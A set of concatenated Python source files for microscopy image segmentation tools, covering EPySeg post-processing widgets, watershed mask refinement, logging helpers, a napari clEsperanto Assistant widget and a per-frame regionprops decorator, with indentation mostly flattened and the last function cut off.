post_process_method_selection_label.setStyleSheet("QLabel { color : red; }")
self.post_process_method_selection = QComboBox(objectName='post_process_method_selection')
self.post_process_method_selection.addItem('Default (Slow/robust) (EPySeg pre-trained model only!)')
self.post_process_method_selection.addItem('Fast (May contain more errors) (EPySeg pre-trained model only!)')
self.post_process_method_selection.addItem('Old method (Sometimes better than default) (EPySeg pre-trained model only!)')
self.post_process_method_selection.addItem('Simply binarize output using threshold')
self.post_process_method_selection.addItem('Keep first channel only')
self.post_process_method_selection.addItem('None (Raw model output)')
self.post_process_method_selection.currentTextChanged.connect(self._post_process_method_changed)
group_box_post_process_parameters_layout.addWidget(post_process_method_selection_label, 0, 0, 1, 1)
group_box_post_process_parameters_layout.addWidget(self.post_process_method_selection, 0, 1, 1, 3)
# TODO --> always make this relative
threshold_label = QLabel(
'Threshold: (in case of over/under segmentation, please increase/decrease, respectively)') # (or bond score for pretrained model)
threshold_label.setStyleSheet("QLabel { color : red; }")
self.threshold_bond_or_binarisation = QDoubleSpinBox(objectName='threshold_bond_or_binarisation')
self.threshold_bond_or_binarisation.setSingleStep(0.01)
self.threshold_bond_or_binarisation.setRange(0.01, 1)
self.threshold_bond_or_binarisation.setValue(0.42)
self.threshold_bond_or_binarisation.setEnabled(False)
# threshold_hint = QLabel() # (or bond score for pretrained model)
self.autothreshold = QCheckBox("Auto", objectName='autothreshold')
self.autothreshold.setChecked(True)
self.autothreshold.stateChanged.connect(self._threshold_changed)
group_box_post_process_parameters_layout.addWidget(threshold_label, 1, 0, 1, 2)
group_box_post_process_parameters_layout.addWidget(self.threshold_bond_or_binarisation, 1, 2)
group_box_post_process_parameters_layout.addWidget(self.autothreshold, 1, 3)
# groupBox_post_process_parameters_layout.addWidget(threshold_hint, 0, 3)
filter_by_size_label = QLabel('Further filter segmentation by size:')
self.filter_by_cell_size_combo = QComboBox(objectName='filter_by_cell_size_combo')
self.filter_by_cell_size_combo.addItem('None (quite often the best choice)')
self.filter_by_cell_size_combo.addItem('Local median (slow/very good) divided by')
self.filter_by_cell_size_combo.addItem('Cells below Average area (global) divided by')
self.filter_by_cell_size_combo.addItem('Global median divided by')
self.filter_by_cell_size_combo.addItem('Cells below size (in px)')
# add a listener to model Architecture
self.filter_by_cell_size_combo.currentTextChanged.connect(self._filter_changed)
group_box_post_process_parameters_layout.addWidget(filter_by_size_label, 2, 0)
group_box_post_process_parameters_layout.addWidget(self.filter_by_cell_size_combo, 2, 1, 1, 2)
self.avg_area_division_or_size_spinbox = QSpinBox(objectName='avg_area_division_or_size_spinbox')
self.avg_area_division_or_size_spinbox.setSingleStep(1)
self.avg_area_division_or_size_spinbox.setRange(1, 10000000) # 100_000 makes no sense (oom) but anyway
self.avg_area_division_or_size_spinbox.setValue(2) # probably should be 1 to 3 depending on the tissue
self.avg_area_division_or_size_spinbox.setEnabled(False)
group_box_post_process_parameters_layout.addWidget(self.avg_area_division_or_size_spinbox, 2, 3)
self.prevent_exclusion_of_too_many_cells_together = QCheckBox('Do not exclude groups bigger than', objectName='prevent_exclusion_of_too_many_cells_together')
self.prevent_exclusion_of_too_many_cells_together.setChecked(False)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(False)
# max_nb_of_cells_to_be_excluded_together_label = QLabel('Group size')
self.max_nb_of_cells_to_be_excluded_together_spinbox = QSpinBox(objectName='max_nb_of_cells_to_be_excluded_together_spinbox')
self.max_nb_of_cells_to_be_excluded_together_spinbox.setSingleStep(1)
self.max_nb_of_cells_to_be_excluded_together_spinbox.setRange(1, 10000000) # max makes no sense
self.max_nb_of_cells_to_be_excluded_together_spinbox.setValue(
3) # default should be 2 or 3 because seg is quite good so above makes no sense
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(False)
cells_text_labels = QLabel('cells')
self.restore_secure_cells = QCheckBox('Restore most likely cells',objectName='restore_secure_cells')
self.restore_secure_cells.setChecked(False)
self.restore_secure_cells.setEnabled(False)
# help for post process
# help_ico = QIcon.fromTheme('help-contents')
self.help_button_postproc = QPushButton('?', None)
bt_width = self.help_button_postproc.fontMetrics().boundingRect(self.help_button_postproc.text()).width() + 7
self.help_button_postproc.setMaximumWidth(bt_width * 2)
self.help_button_postproc.clicked.connect(self.show_tip)
group_box_post_process_parameters_layout.addWidget(self.restore_secure_cells, 3, 0)
group_box_post_process_parameters_layout.addWidget(self.prevent_exclusion_of_too_many_cells_together, 3, 1)
group_box_post_process_parameters_layout.addWidget(self.max_nb_of_cells_to_be_excluded_together_spinbox, 3, 2)
group_box_post_process_parameters_layout.addWidget(cells_text_labels, 3, 3)
# TODO --> improve layout to make help button smaller
group_box_post_process_parameters_layout.addWidget(self.help_button_postproc, 0, 5, 3, 1)
self.groupBox_post_process.setLayout(group_box_post_process_parameters_layout)
input_v_layout.addWidget(self.groupBox_post_process)
self.setLayout(input_v_layout)
if self._is_dialog:
# OK and Cancel buttons
self.buttons = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel,
QtCore.Qt.Horizontal, self)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.layout().addWidget(self.buttons)
def _threshold_changed(self):
self.threshold_bond_or_binarisation.setEnabled(not self.autothreshold.isChecked())
def _post_process_method_changed(self):
text = self.post_process_method_selection.currentText().lower()
if 'none' in text or 'first' in text:
self.set_threshold_enabled(False)
self.set_safety_parameters(False)
self.set_filter_by_size_enabled(False)
elif 'simply' in text:
self.set_threshold_enabled(True)
self.set_safety_parameters(False)
self.set_filter_by_size_enabled(False)
elif 'old' in text:
self.set_threshold_enabled(False)
self.set_safety_parameters(True)
self.set_filter_by_size_enabled(True)
else:
self.set_threshold_enabled(True)
self.set_safety_parameters(False)
self.set_filter_by_size_enabled(True)
def set_filter_by_size_enabled(self, enabled):
    self.filter_by_cell_size_combo.setEnabled(enabled)
    self.avg_area_division_or_size_spinbox.setEnabled(enabled)
def set_threshold_enabled(self, enabled):
    self.autothreshold.setEnabled(enabled)
    if enabled:
        self._threshold_changed()
    else:
        self.threshold_bond_or_binarisation.setEnabled(False)
def set_safety_parameters(self, enabled):
self._filter_changed()
def show_tip(self):
QToolTip.showText(self.sender().mapToGlobal(QPoint(30, 30)), markdown_file_to_html('refine_segmentation.md'))
def isChecked(self):
return self.groupBox_post_process.isChecked()
def setChecked(self, checked):
    return self.groupBox_post_process.setChecked(checked)
def _filter_changed(self):
current_filter = self.filter_by_cell_size_combo.currentText().lower()
current_mode = self.post_process_method_selection.currentText().lower()
if 'one' in current_filter:
self.avg_area_division_or_size_spinbox.setEnabled(False)
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(False)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(False)
self.restore_secure_cells.setEnabled(False)
else:
self.avg_area_division_or_size_spinbox.setEnabled(True)
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(True)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(True)
self.restore_secure_cells.setEnabled(True)
if 'divided' in current_filter:
self.avg_area_division_or_size_spinbox.setValue(2)
else:
self.avg_area_division_or_size_spinbox.setValue(300)
if not 'old' in current_mode:
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(False)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(False)
self.restore_secure_cells.setEnabled(False)
def _get_post_process_filter(self):
current_filter = self.filter_by_cell_size_combo.currentText().lower()
if 'one' in current_filter or not self.filter_by_cell_size_combo.isEnabled():
return None
if 'size' in current_filter:
return self.avg_area_division_or_size_spinbox.value()
if 'verage' in current_filter:
return 'avg'
if 'local' in current_filter:
return 'local'
if 'global' in current_filter:
return 'global median'
def get_parameters_directly(self):
'''Get the parameters for model training
Returns
-------
dict
containing post processing parameters
'''
self.post_process_parameters = {}
post_proc_method = self.post_process_method_selection.currentText().lower()
if 'none' in post_proc_method:
self.post_process_parameters['post_process_algorithm'] = None
else:
self.post_process_parameters['post_process_algorithm'] = post_proc_method
self.post_process_parameters['filter'] = self._get_post_process_filter()
if self.threshold_bond_or_binarisation.isEnabled():
self.post_process_parameters['threshold'] = self.threshold_bond_or_binarisation.value()
if self.autothreshold.isEnabled() and self.autothreshold.isChecked():
    self.post_process_parameters['threshold'] = None  # None means auto-threshold; maybe add more options some day
if self.avg_area_division_or_size_spinbox.isEnabled():
self.post_process_parameters['correction_factor'] = self.avg_area_division_or_size_spinbox.value()
if self.restore_secure_cells.isEnabled():
self.post_process_parameters['restore_safe_cells'] = self.restore_secure_cells.isChecked()
if self.max_nb_of_cells_to_be_excluded_together_spinbox.isEnabled():
self.post_process_parameters[
'cutoff_cell_fusion'] = self.max_nb_of_cells_to_be_excluded_together_spinbox.value() if self.prevent_exclusion_of_too_many_cells_together.isChecked() else None
if 'old' in self.post_process_method_selection.currentText().lower():
# just for max use that --> maybe do this as an option some day
self.post_process_parameters['hq_predictions'] = 'max'
return self.post_process_parameters
def get_parameters(self):
return self.get_parameters_directly()
@staticmethod
def getDataAndParameters(parent_window=None, _is_dialog=False):
# get all the params for augmentation
dialog = PostProcessGUI(parent_window=parent_window, _is_dialog=_is_dialog)
result = dialog.exec_()
parameters = dialog.get_parameters()
return (parameters, result == QDialog.Accepted)
if __name__ == '__main__':
# just for a test
app = QApplication(sys.argv)
parameters, ok = PostProcessGUI.getDataAndParameters(parent_window=None)
print(parameters, ok)
sys.exit(0)
# TODO change default parameters depending on whether a pre-trained model is selected or not
# TODO allow retraining of the model --> just give it a try...
```
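For downstream consumers, a hedged sketch of the dictionary produced by `get_parameters_directly()` above; the key names are taken from the code, the values shown are only illustrative:

```python
# Illustrative only; actual values depend on the options selected in the GUI.
post_process_parameters = {
    'post_process_algorithm': 'default (slow/robust) (epyseg pre-trained model only!)',
    'filter': None,          # or 'local', 'avg', 'global median', or a pixel size
    'threshold': None,       # None requests auto-thresholding downstream
    'correction_factor': 2,  # divider applied to the chosen size filter
}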
#### File: epyseg/postprocess/refine_v2.py
```python
from scipy import ndimage
from skimage.filters import threshold_otsu
# from skimage.morphology import watershed
from skimage.segmentation import watershed
from epyseg.img import Img
from skimage.measure import label, regionprops
import os
import numpy as np
# logging
from epyseg.tools.logger import TA_logger
import tempfile
from epyseg.postprocess.filtermask import FilterMask
from epyseg.postprocess.edmshed import segment_cells
logger = TA_logger()
class RefineMaskUsingSeeds:
def __init__(self):
pass
def process(self, input=None, mode=None, _DEBUG=False, _VISUAL_DEBUG=False, output_folder=tempfile.gettempdir(),
output_name='handCorrection.tif', threshold=None,
filter=None,
correction_factor=2,
**kwargs):
if input is None:
logger.error('no input image --> nothing to do')
return
# TODO test it with several images just to see if that works
if isinstance(mode, str) and 'first' in mode:
    # return the first channel only; re-add a channel axis to keep the ...hwc format
    out = input[..., 0]
    return out[..., np.newaxis]
img_orig = input
if not img_orig.has_c() or img_orig.shape[-1] != 7:
# TODO in fact could do the fast mode still on a single image --> may be useful
logger.error('image must have 7 channels to be used for post process')
return img_orig
if _DEBUG:
Img(img_orig, dimensions='hwc').save(os.path.join(output_folder, 'raw_input.tif'))
bckup_img_wshed = img_orig[..., 0].copy()
if mode is not None and isinstance(mode, str):
if 'ast' in mode:
logger.debug('fast mode')
img_orig[..., 0] += img_orig[..., 1]
img_orig[..., 0] += img_orig[..., 2]
img_orig = img_orig[..., 0] / 3
img_orig = np.reshape(img_orig, (*img_orig.shape, 1))
else:
logger.debug('normal mode')
else:
logger.debug('normal mode')
differing_bonds = np.zeros_like(img_orig)
img_orig[..., 0] = segment_cells(img_orig[..., 0], min_threshold=0.02, min_unconnected_object_size=3)
if img_orig.shape[-1] >= 5:
img_orig[..., 1] = segment_cells(img_orig[..., 1], min_threshold=0.06, min_unconnected_object_size=6)
img_orig[..., 2] = segment_cells(img_orig[..., 2], min_threshold=0.15, min_unconnected_object_size=12)
img_orig[..., 3] = Img.invert(img_orig[..., 3])
img_orig[..., 3] = segment_cells(img_orig[..., 3], min_threshold=0.06, min_unconnected_object_size=6)
img_orig[..., 4] = Img.invert(img_orig[..., 4])
img_orig[..., 4] = segment_cells(img_orig[..., 4], min_threshold=0.15, min_unconnected_object_size=12)
if img_orig.shape[-1] == 7:
img_orig[..., 5] = self.binarise(img_orig[..., 5], threshold=0.15)
img_orig[..., 6] = Img.invert(img_orig[..., 6])
img_orig[..., 6] = self.binarise(img_orig[..., 6], threshold=0.1)
if _DEBUG:
Img(img_orig, dimensions='hwc').save(os.path.join(output_folder, 'thresholded_masks.tif'))
# get watershed mask for all images
for i in range(img_orig.shape[-1]):
if i < 5:
final_seeds = label(Img.invert(img_orig[..., i]), connectivity=1, background=0)
else:
final_seeds = label(img_orig[..., i], connectivity=None, background=0)
final_wshed = watershed(bckup_img_wshed, markers=final_seeds, watershed_line=True)
final_wshed[final_wshed != 0] = 1
final_wshed[final_wshed == 0] = 255
final_wshed[final_wshed == 1] = 0
differing_bonds[..., i] = final_wshed
del final_seeds
del final_wshed
if _DEBUG:
print(os.path.join(output_folder, 'differences.tif'))
Img(differing_bonds, dimensions='hwc').save(os.path.join(output_folder, 'differences.tif'))
Img(bckup_img_wshed, dimensions='hw').save(os.path.join(output_folder, 'orig_img.tif'))
avg = np.mean(differing_bonds, axis=-1)
avg = avg / avg.max()
if _DEBUG:
Img(avg, dimensions='hw').save(os.path.join(output_folder, output_name + str('avg.tif')))
if threshold is None:
threshold = self.autothreshold(avg)
logger.debug('threshold used for producing the final mask=' + str(threshold))
final_mask = avg.copy()
final_mask = self.binarise(final_mask, threshold=threshold)
if _DEBUG:
Img(final_mask, dimensions='hw').save(os.path.join(output_folder, 'binarized.tif'))
# close wshed mask to fill super tiny holes
s = ndimage.generate_binary_structure(2, 1)
final_mask = ndimage.grey_dilation(final_mask, footprint=s)
# remove super tiny artificial cells (very small value cause already dilated)
mask = label(Img.invert(final_mask), connectivity=1, background=0)
for region in regionprops(mask):
if region.area < 5:
for coordinates in region.coords:
final_mask[coordinates[0], coordinates[1]] = 255
del mask
final_mask = label(Img.invert(final_mask), connectivity=1, background=0)
final_mask = watershed(bckup_img_wshed, markers=final_mask, watershed_line=True)
final_mask[final_mask != 0] = 1
final_mask[final_mask == 0] = 255
final_mask[final_mask == 1] = 0
if filter is None or filter == 0:
return final_mask.astype(np.uint8)
else:
logger.debug('Further filtering image')
return FilterMask(bckup_img_wshed, final_mask, filter=filter, correction_factor=correction_factor)
def autothreshold(self, single_2D_img):
try:
return threshold_otsu(single_2D_img)
except ValueError:
logger.error('Image is just one color, thresholding cannot be done')
return single_2D_img
def binarise(self, single_2D_img, threshold=0.5, bg_value=0, fg_value=255):
# TODO may change this to >= and < try it
single_2D_img[single_2D_img > threshold] = fg_value
single_2D_img[single_2D_img <= threshold] = bg_value
return single_2D_img
```
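A minimal sketch of calling the refiner directly, assuming a 7-channel (h, w, c) prediction stack as produced by the EPySeg pre-trained model; the data here is synthetic and the import path is taken from the file header:

```python
import numpy as np
from epyseg.img import Img
from epyseg.postprocess.refine_v2 import RefineMaskUsingSeeds  # assumed import path

# synthetic stand-in for the 7-channel model output; channel 0 acts as the watershed map
pred = Img(np.random.rand(128, 128, 7).astype(np.float32), dimensions='hwc')

refined = RefineMaskUsingSeeds().process(input=pred, mode='fast', threshold=None)
print(refined.shape, refined.dtype)  # (128, 128) uint8 mask, 255 at cell bonds
```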
#### File: epyseg/tools/logger.py
```python
import logging
class TA_logger(object):
# DEBUG < INFO < WARNING < ERROR < CRITICAL
default_format = '%(levelname)s - %(asctime)s - %(filename)s - %(funcName)s - line %(lineno)d - %(message)s\n'
master_logger_name = 'master'
DEBUG = logging.DEBUG
INFO = logging.INFO
WARNING = logging.WARNING
ERROR = logging.ERROR
CRITICAL = logging.CRITICAL
DEFAULT = INFO
loggers = {}
def __new__(cls, name=master_logger_name, logging_level=DEFAULT, format=default_format, handler=None):
if name is not None:
if name in cls.loggers:
return cls.loggers.get(name)
logger = logging.getLogger(name)
if handler is None:
# create a formatter
formatter = logging.Formatter(format)
# create handler
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger.addHandler(handler)
# set level to logging_level
cls.DEFAULT = logging_level
logger.setLevel(logging_level)
cls.loggers[name] = logger
return logger
@staticmethod
def setHandler(handler, name=master_logger_name):
# easy way to redirect all logs to the same logger
logger = logging.getLogger(name)
try:
for hndlr in logger.handlers:
logger.removeHandler(hndlr)
except:
pass
logger.addHandler(handler)
logger.setLevel(TA_logger.DEFAULT)
if __name__ == '__main__':
logger = TA_logger()
logger.debug("test")
logger.info("test")
logger.warning("test")
logger.error("test")
logger.critical("test")
formatter = logging.Formatter(TA_logger.default_format)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
TA_logger.setHandler(handler)
logger.debug("test")
logger.info("test")
logger.warning("test")
logger.error("test")
logger.critical("test")
```
#### File: epyseg/tools/qthandler.py
```python
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
import logging
class QtHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
def emit(self, record):
record = self.format(record)
if record:
if record.startswith('ERROR') or record.startswith('CRITICAL'):
XStream.stderr().write('%s' % record)
else:
XStream.stdout().write('%s' % record)
class XStream(QtCore.QObject):
_stdout = None
_stderr = None
messageWritten = QtCore.pyqtSignal(str)
def flush(self):
pass
def fileno(self):
return -1
def write(self, msg):
if not self.signalsBlocked():
self.messageWritten.emit(msg)
@staticmethod
def stdout():
if not XStream._stdout:
XStream._stdout = XStream()
sys.stdout = XStream._stdout
return XStream._stdout
@staticmethod
def stderr():
if not XStream._stderr:
XStream._stderr = XStream()
sys.stderr = XStream._stderr
return XStream._stderr
``` |
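The logger and the Qt handler above are designed to work together; a hedged wiring sketch (import paths assumed from the file headers, the console widget is hypothetical):

```python
from PyQt5.QtWidgets import QApplication, QPlainTextEdit
# import paths assumed from the file headers above
from epyseg.tools.logger import TA_logger
from epyseg.tools.qthandler import QtHandler, XStream

app = QApplication([])
console = QPlainTextEdit()  # hypothetical in-app log console

# XStream replaces sys.stdout/sys.stderr and re-emits writes as Qt signals
XStream.stdout().messageWritten.connect(console.insertPlainText)
XStream.stderr().messageWritten.connect(console.insertPlainText)

# route every TA_logger record through the Qt handler (and hence into XStream)
TA_logger.setHandler(QtHandler())
TA_logger().info('log lines now end up in the widget')
console.show()
```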
{
"source": "jo-mueller/napari_pyclesperanto_assistant",
"score": 2
} |
#### File: napari_pyclesperanto_assistant/_gui/_Assistant.py
```python
from __future__ import annotations
from pathlib import Path
from typing import TYPE_CHECKING, Dict, Tuple, Callable
from warnings import warn
import napari
import pyclesperanto_prototype as cle
from qtpy.QtWidgets import QFileDialog, QLineEdit, QVBoxLayout, QHBoxLayout, QWidget, QMenu, QLabel
from qtpy.QtGui import QCursor, QIcon
from typing import Union
from ._select_gpu import select_gpu
from .._categories import CATEGORIES, Category, filter_categories
from .._pipeline import Pipeline
from ._button_grid import ButtonGrid
from ._category_widget import (
OP_ID,
OP_NAME_PARAM,
VIEWER_PARAM,
make_gui_for_category,
num_positional_args
)
if TYPE_CHECKING:
from magicgui.widgets import FunctionGui
from napari.layers import Layer
from napari.viewer import Viewer
from napari import __version__ as napari_version
from packaging.version import parse as parse_version
from napari_tools_menu import register_dock_widget
npv = parse_version(napari_version)
NAP048 = (npv.major, npv.minor, npv.micro) >= (0, 4, 8)
@register_dock_widget(menu="Utilities > Assistant (clEsperanto)")
class Assistant(QWidget):
"""The main cle Assistant widget.
The widget holds buttons with icons to create widgets for the various
cle operation categories. It tracks which layers are connected to which
widgets, and can export the state of the task graph to a dask graph
or to jython code.
Parameters
----------
napari_viewer : Viewer
This viewer instance will be provided by napari when it gets added
as a plugin dock widget.
"""
def __init__(self, napari_viewer: Viewer):
super().__init__()
self._viewer = napari_viewer
napari_viewer.layers.events.removed.connect(self._on_layer_removed)
napari_viewer.layers.selection.events.changed.connect(self._on_selection)
self._layers = {}
# visualize intermediate results human-readable from top-left to bottom-right
self._viewer.grid.stride = -1
CATEGORIES["Measure"] = self._measure
CATEGORIES["Generate code..."] = self._code_menu
# build GUI
icon_grid = ButtonGrid(self)
icon_grid.addItems(CATEGORIES)
icon_grid.itemClicked.connect(self._on_item_clicked)
self.search_field = QLineEdit("")
def text_changed(*args, **kwargs):
    search_string = self.search_field.text().lower()
    icon_grid.clear()
    icon_grid.addItems(filter_categories(search_string))
self.search_field.textChanged.connect(text_changed)
# create menu
self.actions = [
("Export Python script to file", self.to_jython),
("Export Jupyter Notebook", self.to_notebook),
("Copy to clipboard", self.to_clipboard),
]
# add Send to script editor menu in case it's installed
try:
import napari_script_editor
self.actions.append(("Send to Script Editor", self.to_script_editor))
except ImportError:
pass
self.setLayout(QVBoxLayout())
search_and_help = QWidget()
search_and_help.setLayout(QHBoxLayout())
from ._button_grid import _get_icon
help = QLabel("?")
help.setToolTip(
'<html>'
'Use the search field on the left to enter a term describing the function you would like to apply to your image.\n'
'Searching will limit the number of shown categories and listed operations.\n'
'<br><br>The icons in the buttons below denote the processed image types:\n'
'<br><img src="' + _get_icon("intensity_image") + '" width="24" heigth="24"> In <b>intensity images</b> the pixel value represents a measurement, e.g. of collected light during acquisition in a microscope.\n'
'<br><img src="' + _get_icon("binary_image") + '" width="24" heigth="24"> In <b>binary images</b> pixels with value 0 mean there is no object present. All other pixels (typically value 1) represent any object.\n'
'<br><img src="' + _get_icon("label_image") + '" width="24" heigth="24"> In <b>label images</b> the integer pixel intensity corresponds to the object identity. E.g. all pixels of object 2 have value 2.\n'
'<br><img src="' + _get_icon("parametric_image") + '" width="24" heigth="24"> In <b>parametric images</b> the pixel value represents an object measurement. All pixels of an object can for example contain the same value, e.g. the objects circularity or area.\n'
'<br><img src="' + _get_icon("mesh_image") + '" width="24" heigth="24"> In <b>mesh images</b> we can visualize connectivity between objects and distances as intensity along lines.\n'
'<br><img src="' + _get_icon("any_image") + '" width="24" heigth="24"> This icon means one can use <b>any kind of image</b> for this operation.'
'</html>'
)
help.setMaximumWidth(20)
search_and_help.layout().addWidget(self.search_field)
search_and_help.layout().addWidget(help)
self.layout().addWidget(search_and_help)
self.layout().addWidget(icon_grid)
self.layout().setContentsMargins(5, 5, 5, 5)
self.setMinimumWidth(345)
select_gpu()
def _measure(self):
from .._statistics_of_labeled_pixels import statistics_of_labeled_pixels
self._viewer.window.add_function_widget(statistics_of_labeled_pixels)
def _code_menu(self):
menu = QMenu(self)
for name, cb in self.actions:
submenu = menu.addAction(name)
submenu.triggered.connect(cb)
menu.move(QCursor.pos())
menu.show()
def _on_selection(self, event):
for layer, (dw, gui) in self._layers.items():
if layer in self._viewer.layers.selection:
dw.show()
else:
dw.hide()
def _on_active_layer_change(self, event):
for layer, (dw, gui) in self._layers.items():
dw.show() if event.value is layer else dw.hide()
def _on_layer_removed(self, event):
layer = event.value
if layer in self._layers:
dw = self._layers[layer][0]
try:
self._viewer.window.remove_dock_widget(dw)
except KeyError:
pass
# remove layer from internal list
self._layers.pop(layer)
def _on_item_clicked(self, item):
self._activate(CATEGORIES.get(item.text()))
def _get_active_layer(self):
return self._viewer.layers.selection.active
def _activate(self, category: Union[Category, Callable]):
if callable(category):
category()
return
# get currently active layer (before adding dock widget)
input_layer = self._get_active_layer()
if not input_layer:
warn("Please select a layer first")
return False
# make a new widget
gui = make_gui_for_category(category, self.search_field.text(), self._viewer)
# prevent auto-call when adding to the viewer, to avoid double calls
# do this here rather than widget creation for the sake of
# non-Assistant-based widgets.
gui._auto_call = False
# add gui to the viewer
dw = self._viewer.window.add_dock_widget(gui, area="right", name=category.name)
# make sure the originally active layer is the input
try:
gui.input0.value = input_layer
except ValueError:
pass # this happens if input0 should be labels but we provide an image
# call the function widget &
# track the association between the layer and the gui that generated it
self._layers[gui()] = (dw, gui)
# turn on auto_call, and make sure that if the input changes we update
gui._auto_call = True
self._connect_to_all_layers()
def _refresh_data(self, event):
    self._refresh(event.source)
def _refresh(self, changed_layer):
"""Goes through all layers and refreshs those which have changed_layer as input
Parameters
----------
changed_layer
"""
for layer, (dw, mgui) in self._layers.items():
for w in mgui:
if w.value == changed_layer:
mgui()
def _connect_to_all_layers(self):
"""Attach an event listener to all layers that are currently open in napari
"""
for layer in self._viewer.layers:
layer.events.data.disconnect(self._refresh_data)
layer.events.data.connect(self._refresh_data)
def load_sample_data(self, fname="Lund_000500_resampled-cropped.tif"):
data_dir = Path(__file__).parent.parent / "data"
self._viewer.open(str(data_dir / fname))
def _id_to_name(self, id, name_dict):
    if id not in name_dict:
        name_dict[id] = "image" + str(len(name_dict))
    return name_dict[id]
def to_dask(self):
graph = {}
name_dict = {}
for layer, (dw, mgui) in self._layers.items():
key = None
if isinstance(layer.metadata, dict):
key = layer.metadata.get(OP_ID)
if key is None:
key = "some_random_key"
args = []
inputs = []
for w in mgui:
if w.name in (VIEWER_PARAM, OP_NAME_PARAM):
continue
if "napari.layers" in type(w.value).__module__:
op_id = None
if isinstance(w.value.metadata, dict):
op_id = w.value.metadata.get(OP_ID)
if op_id is None:
op_id = "some_random_key"
source = str(w.value.source.path).replace("\\", "/") if w.value.source is not None else "file"
graph[self._id_to_name(op_id, name_dict)] = (cle.imread, ["'" + source + "'"], [], False, layer.contrast_limits[0], layer.contrast_limits[1]) # TODO
inputs.append(self._id_to_name(op_id, name_dict))
else:
args.append(w.value)
from .._categories import find_function
op = find_function(getattr(mgui, OP_NAME_PARAM).value)
# shorten args by eliminating not-used ones
if op:
nargs = num_positional_args(op) - 1 - len(inputs)
args = args[:nargs]
is_labels = isinstance(layer, napari.layers.Labels)
graph[self._id_to_name(key, name_dict)] = (op, inputs, args, is_labels, layer.contrast_limits[0], layer.contrast_limits[1])
return graph
def to_jython(self, filename=None):
if not filename:
filename, _ = QFileDialog.getSaveFileName(self, "Save code as...", ".", "*.py")
return Pipeline.from_assistant(self).to_jython(filename)
def to_notebook(self, filename=None):
if not filename:
filename, _ = QFileDialog.getSaveFileName(self, "Save code as notebook...", ".", "*.ipynb")
return Pipeline.from_assistant(self).to_notebook(filename)
def to_clipboard(self):
import pyperclip
pyperclip.copy(Pipeline.from_assistant(self).to_jython())
def to_script_editor(self):
import napari_script_editor
editor = napari_script_editor.ScriptEditor.get_script_editor_from_viewer(self._viewer)
editor.set_code(Pipeline.from_assistant(self).to_napari_python())
``` |
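A hedged launch sketch; the import path is assumed from the file header, and in practice the widget is normally added through napari's Tools menu thanks to the `register_dock_widget` decorator:

```python
import napari
# assumed import path, matching the file header above
from napari_pyclesperanto_assistant._gui._Assistant import Assistant

viewer = napari.Viewer()
assistant = Assistant(viewer)
viewer.window.add_dock_widget(assistant, area='right', name='Assistant (clEsperanto)')
assistant.load_sample_data()  # ships a small demo stack
napari.run()
```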
{
"source": "jo-mueller/napari-skimage-regionprops",
"score": 2
} |
#### File: napari-skimage-regionprops/napari_skimage_regionprops/_all_frames.py
```python
import napari
from toolz import curry
from typing import Callable
from functools import wraps
import inspect
import numpy as np
import pandas as pd
from ._utilities import isimage
@curry
def analyze_all_frames(function: Callable) -> Callable:
from napari_workflows._workflow import _get_layer_from_data
@wraps(function)
def worker_function(*args, **kwargs):
args = list(args)
sig = inspect.signature(function)
# create mapping from position and keyword arguments to parameters
# will raise a TypeError if the provided arguments do not match the signature
# https://docs.python.org/3/library/inspect.html#inspect.Signature.bind
bound = sig.bind(*args, **kwargs)
# set default values for missing arguments
# https://docs.python.org/3/library/inspect.html#inspect.BoundArguments.apply_defaults
bound.apply_defaults()
# Retrieve the viewer parameter so that we can know which current timepoint is selected
viewer = None
for key, value in bound.arguments.items():
if isinstance(value, napari.Viewer):
viewer = value
viewer_key = key
labels_layer = None
image_layer = None
original_args = copy_dict(bound.arguments)
if viewer is not None:
variable_timepoint = list(viewer.dims.current_step)
current_timepoint = variable_timepoint[0]
max_time = int(viewer.dims.range[-4][1])
# find a labels layer to attach result
for key, value in original_args.items():
if isimage(value):
layer = _get_layer_from_data(viewer, value)
if isinstance(layer, napari.layers.Labels):
labels_layer = layer
labels_layer_key = key
if isinstance(layer, napari.layers.Image):
image_layer = layer
image_layer_key = key
else:
max_time = 0
for key, value in original_args.items():
if isimage(value):
if len(value.shape) == 4 and max_time < value.shape[0]:
max_time = value.shape[0]
original_args = copy_dict(bound.arguments)
result = None
for f in range(max_time):
print("analyzing frame", f)
args = copy_dict(original_args)
if viewer is None:
for key, value in args.items():
if isimage(value):
if len(value.shape) == 4:
new_value = value[f]
if new_value.shape[0] == 1:
new_value = new_value[0]
args[key] = new_value
elif len(value.shape) == 3:
# keep a 3D label image for example
pass
else:
raise NotImplementedError("Analyzing all frames only supports combination of 3D and 4D-data")
else:
# in case of 4D-data (timelapse) crop out the current 3D timepoint
if len(viewer.dims.current_step) != 4:
raise NotImplementedError("Analyzing all frames only supports 4D-data")
variable_timepoint[0] = f
viewer.dims.current_step = variable_timepoint
_refresh_viewer(viewer)
from napari_workflows._workflow import _break_down_4d_to_2d_kwargs
args[labels_layer_key] = labels_layer.data
args[image_layer_key] = image_layer.data
_break_down_4d_to_2d_kwargs(args, f, viewer)
args[viewer_key] = None
bound.arguments = args
# call the decorated function
result_single_frame = function(*bound.args, **bound.kwargs)
result_single_frame['frame'] = [f] * len(result_single_frame['label'])
if result is None:
result = pd.DataFrame(result_single_frame)
else:
result = pd.concat([result, pd.DataFrame(result_single_frame)], ignore_index=True)
if viewer is not None:
# reset viewer
variable_timepoint[0] = current_timepoint
viewer.dims.current_step = variable_timepoint
_refresh_viewer(viewer)
if labels_layer is not None:
labels_layer.properties = result.to_dict(orient='list')
from ._table import add_table
add_table(labels_layer, viewer)
else:
return result.to_dict()
return worker_function
def copy_dict(source, result=None):
if result is None:
result = {}
for k, v in source.items():
result[k] = v
return result
def _refresh_viewer(viewer):
if viewer is None:
return
from napari_workflows import WorkflowManager
wm = WorkflowManager.install(viewer)
w = wm.workflow
